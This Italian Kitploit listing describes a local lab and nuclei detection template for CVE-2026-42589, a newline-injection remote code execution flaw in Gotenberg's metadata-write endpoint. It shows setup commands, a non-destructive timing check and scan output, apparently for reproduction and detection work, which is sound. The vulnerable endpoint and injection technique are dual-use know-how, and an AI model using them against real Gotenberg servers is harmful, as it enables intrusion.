Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/fineman999/poc_cve-2026-42589
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubfineman999/poc_cve-2026-42589

POC_CVE-2026-42589

POC_CVE-2026-42589

Vedi Repository
133 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

POC_CVE-2026-42589

Laboratorio di riproduzione locale e bozza di template nuclei per CVE-2026-42589 che interessa Gotenberg.

Riepilogo

CVE-2026-42589 è un problema di esecuzione remota di codice non autenticata in Gotenberg causato dall'iniezione di newline nella chiave di metadati in:

root@kitploit:~
POST /forms/pdfengines/metadata/write

Le versioni interessate di Gotenberg inoltrano le chiavi di metadati controllate dall'utente a ExifTool senza rifiutare i caratteri di controllo. Una chiave di metadati contenente newline con escape JSON può essere suddivisa in argomenti aggiuntivi di ExifTool.

Questo laboratorio è stato utilizzato per validare:

  • il comportamento vulnerabile su gotenberg/gotenberg:8.29.1
  • il comportamento corretto su gotenberg/gotenberg:8.31.0

Il template nuclei utilizza solo un controllo di temporizzazione non distruttivo basato su sleep 6.

Riferimenti

  • GitHub Advisory: https://github.com/gotenberg/gotenberg/security/advisories/GHSA-rqgh-gxv4-6657
Scarica lo strumento
  • Release corretta: https://github.com/gotenberg/gotenberg/releases/tag/v8.31.0
  • Documentazione ExifTool: https://exiftool.org/exiftool_pod.html
  • File

    • docker-compose.yml
    • docker-compose.latest.yml
    • CVE-2026-42589.yaml
    • manual_verify.py
    • sample.pdf
    • README.md

    Test su versione vulnerabile

    Avvia Gotenberg 8.29.1:

    root@kitploit:~
    docker compose down -v
    docker compose up -d
    docker compose logs --tail=100 gotenberg
    

    Verifica la versione:

    root@kitploit:~
    curl -s http://127.0.0.1:3000/version
    

    Verifica manuale della temporizzazione con multipart grezzo:

    root@kitploit:~
    python3 manual_verify.py http://127.0.0.1:3000
    

    Segnale atteso in caso di vulnerabilità:

    root@kitploit:~
    HTTP/1.1 500 Internal Server Error
    TOTAL_TIME=6.xs
    

    Risultato osservato in caso di vulnerabilità:

    root@kitploit:~
    HTTP/1.1 500 Internal Server Error
    TOTAL_TIME=6.300s
    Internal Server Error
    

    Controllo sulla versione corretta

    Avvia Gotenberg 8.31.0:

    root@kitploit:~
    docker compose -f docker-compose.latest.yml down -v
    docker compose -f docker-compose.latest.yml up -d
    docker compose -f docker-compose.latest.yml logs --tail=100 gotenberg
    

    Verifica la versione:

    root@kitploit:~
    curl -s http://127.0.0.1:3000/version
    

    Esegui la stessa verifica manuale dei tempi:

    root@kitploit:~
    python3 manual_verify.py http://127.0.0.1:3000
    

    Risultato osservato sulla versione corretta:

    root@kitploit:~
    HTTP/1.1 400 Bad Request
    TOTAL_TIME=0.145s
    At least one PDF engine cannot process the requested metadata, while others may have failed to convert due to different issues
    

    Nuclei

    Valida il template:

    root@kitploit:~
    nuclei -duc -validate -t CVE-2026-42589.yaml
    

    Esegui contro il target vulnerabile:

    root@kitploit:~
    nuclei -duc -u http://127.0.0.1:3000 -t CVE-2026-42589.yaml
    

    Comportamento atteso:

    • 8.29.1: corrispondenza dopo la risposta 500 ritardata
    • 8.31.0: nessuna corrispondenza

    Risultato osservato in caso di vulnerabilità:

    root@kitploit:~
    [CVE-2026-42589] [http] [critical] http://127.0.0.1:3000/forms/pdfengines/metadata/write
    [INF] Scan completed in 6.245907708s. 1 matches found.
    

    Risultato osservato sulla versione corretta:

    root@kitploit:~
    [INF] Scan completed in 93.01425ms. No results found.
    

    Note

    • Questo laboratorio evita intenzionalmente scritture su file, reverse shell e callback out-of-band.
    • Il template rileva il comportamento, non solo un banner di versione.
    • Non sono stati utilizzati target reali.
    • Utilizzare solo su sistemi di cui si è proprietari o per i quali si è esplicitamente autorizzati a eseguire test.